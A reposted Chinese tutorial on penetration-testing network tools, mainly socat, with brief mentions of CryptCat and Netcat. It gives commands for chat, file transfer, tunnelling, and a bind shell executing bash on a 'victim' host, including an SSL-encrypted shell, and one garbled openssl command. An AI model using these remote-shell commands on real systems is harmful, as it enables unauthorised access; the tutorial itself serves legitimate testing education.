渗透测试中的哪些网络军刀

本文,为大家简单介绍我们常见的网络工具的一些使用方法。

快捷目录

Socat

Socat 是 Linux 下的一个多功能的网络工具。可以看做是 Netcat 的加强版。Socat 的主要特点就是在两个数据流之间建立通道,且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE等。Nc可能是因为比较久没有维护,确实显得有些陈旧了。

😘安装

apt-get install socat

🤖监听 聊天工具

首先,我们在服务端开始监听。(谁做服务端,谁就要加stdout)

socat -dd tcp-listen:7777 stdout

渗透测试中的哪些网络军刀接下来,我们客户端连接。

socat - tcp4:192.168.50.77:7777
渗透测试中的哪些网络军刀

🐸正 反向弹shell

目标机(受害端)执行命令

socat tcp4-listen:8000 exec:/usr/bin/bash

攻击端执行命令

socat - tcp4:192.168.50.77:8000

效果如下:

渗透测试中的哪些网络军刀

😎文件传输

文件传输是最常用的,让我们一起看看如何实现。发送端执行命令

socat tcp4-listen:8000 file:kali.txt

接收端执行命令

socat tcp4:192.168.50.77:8000 file:kali.txt,creat
渗透测试中的哪些网络军刀

🐻‍❄️搭建异地组网

需要注意的是,服务端需为公网vps。

socat -d -d TCP-LISTEN:11443,reuseaddr TUN:192.168.255.1/24,up

客户端

socat TCP:xxx.xxx.xxx.xxx:11443 TUN:192.168.255.2/24,up #注意为公网IP和开启相关端口

📧SSL 连接

前面我们使用 socat 传 shell 的时候,其实交流的内容是明文传输的。为了让信息传输更加安全,我们借助 SSL 证书来完成这个操作。首先使用 openssl 这个软件,生成一个自签证书,为了让 socat 可以识别我们的证书和密钥,首先要把证书和密钥放进同一个文件中,并以.pem格式保存

openssl reg -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36
2 -out bind shell.crt

接下来,服务端执行命令

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

客户端执行命令

socat - OPENSSL:监听端的 IP:443,verify=0

当然,还有更多的玩法。大家可以参考命令帮助。

渗透测试中的哪些网络军刀

CryptCat

CryptCat具有双向加密功能。它可以跨网络连接读取和写入数据,使用 TCP 或 UDP协议。同时对通过网络传输的数据进行加密。详细教程请移步历史文章。

渗透测试中的哪些网络军刀
NC增强工具CryptCat

Netcat

之前也写过详细的使用文章,详细教程请移步历史文章。

渗透测试中的哪些网络军刀
Netcat(瑞士军刀)你想知道的都在这里

本内容观点仅代表发布作者本人观点立场,欣文网平台只做信息内容展示和存储。发布作者:全网转载,转转请注明出处:https://www.xinenw.com/34468

(0)
上一篇 2024年8月11日 19:31
下一篇 2024年8月11日 21:16

相关推荐

  • 管培生千万别乱投,会变得不幸

    又是一年毕业季,毕业生最常social的场合可能是双选会和校招宣讲,最常使用软件估计也从某音变成了某Boss。 众多秋招、春招岗里,最卷不过管培生。高学历只是管培的门槛,笔试、面试又得过五关斩六将。 然而,管培生就像是一场淋漓尽致的职场“诈骗”——百名管培生被临时转岗、赔偿降薪;入职一年不许升职、调薪……这几年,类似的消息数不胜数。对即将毕业的应届生们来说,…

    2024年5月29日
    20000
  • 为什么越来越多的年轻人,确诊为朴树?

    人们爱朴树,或许是因为在某种程度上,每个人都能从朴树身上看到自己的影子。明明对周围环境有着敏锐的感受,对情感流动有着强烈的需求,但在繁重的工作和生存压力之下,在日常生活中总是难以抑制地紧绷神经,勉强自己。 “很奇怪,越是感觉不自然,就越想回到自然……自然万物,只是存在着,就足以安抚每一个敏感的人。” 文 | 姜清清 编辑 | 辛野 运营 | 橙子 “起飞的朴…

    2024年4月26日
    12200
  • 这个夏天救我命的冰杯,卖这么贵是有原因的。

    今年夏天,冰杯好像火了。。。 这玩意儿,大概就长下面这个样,简单地说,就是杯子 + 冰块儿,咱可以往里面倒咖啡、果汁、酒等各种产品。  而在炎热的夏日午后,冰杯 + 饮料,那是爽得呱呱叫。 像是微博上,在最近短短一两个月内,冰杯相关的话题就上了好几次热搜。 小红书上,冰杯也成了网友 DIY 各种饮品时,必不可缺的一环。 就连同事蛋蛋,前段时间也在向差评君安利…

    2024年8月18日
    8500
  • 6 件低成本的生活小技巧,不花钱也可以让生活中的仪式感满满

    今天是中国的传统节日——七夕。如今,七夕已经成为现代人表达爱意、增强情感的重要时刻。而在这个特别的日子里,仪式感也扮演着至关重要的角色。 但有趣的是男女生对仪式感的理解与追求,却常常展现出不同的风景。在日常生活中,我们经常会看到女生为某些特殊日子做出精心的准备,比如生日、纪念日、节日等。她们可能会购买礼物、准备惊喜、精心打扮,希望通过这些仪式感的表现,让自己…

    2024年8月19日
    3500
  • 她发现,学神学渣,主要看爹

    作者 | 南风窗记者 姚远 值班主编 | 赵靖含 教育社会学家姜以琳时常与失望为伍。 她发现,人们对教育抱有一种不切实际的期待。在广泛的社会共识中,教育是改变命运的枢纽,是向上流动的阶梯,它是人类创造的、让这个世界更公平向善的伟大系统。 从前的姜以琳也这么想,所以在美国宾夕法尼亚大学攻读博士学位期间,她怀着美好的愿望走进教育社会学的田野,却逐渐在这片灿烂田野…

    2024年5月7日
    13600

发表回复

登录后才能评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件A:xinenw@qq.com

邮箱B:xinenw@163.com

工作时间:周一至周五,8:30-23:30;周六周日10:30-18:30;节假日休息

关注微信
欣文网内容建设升级中,欢迎您参与意见征集进行评论,只为打造更好的内容平台!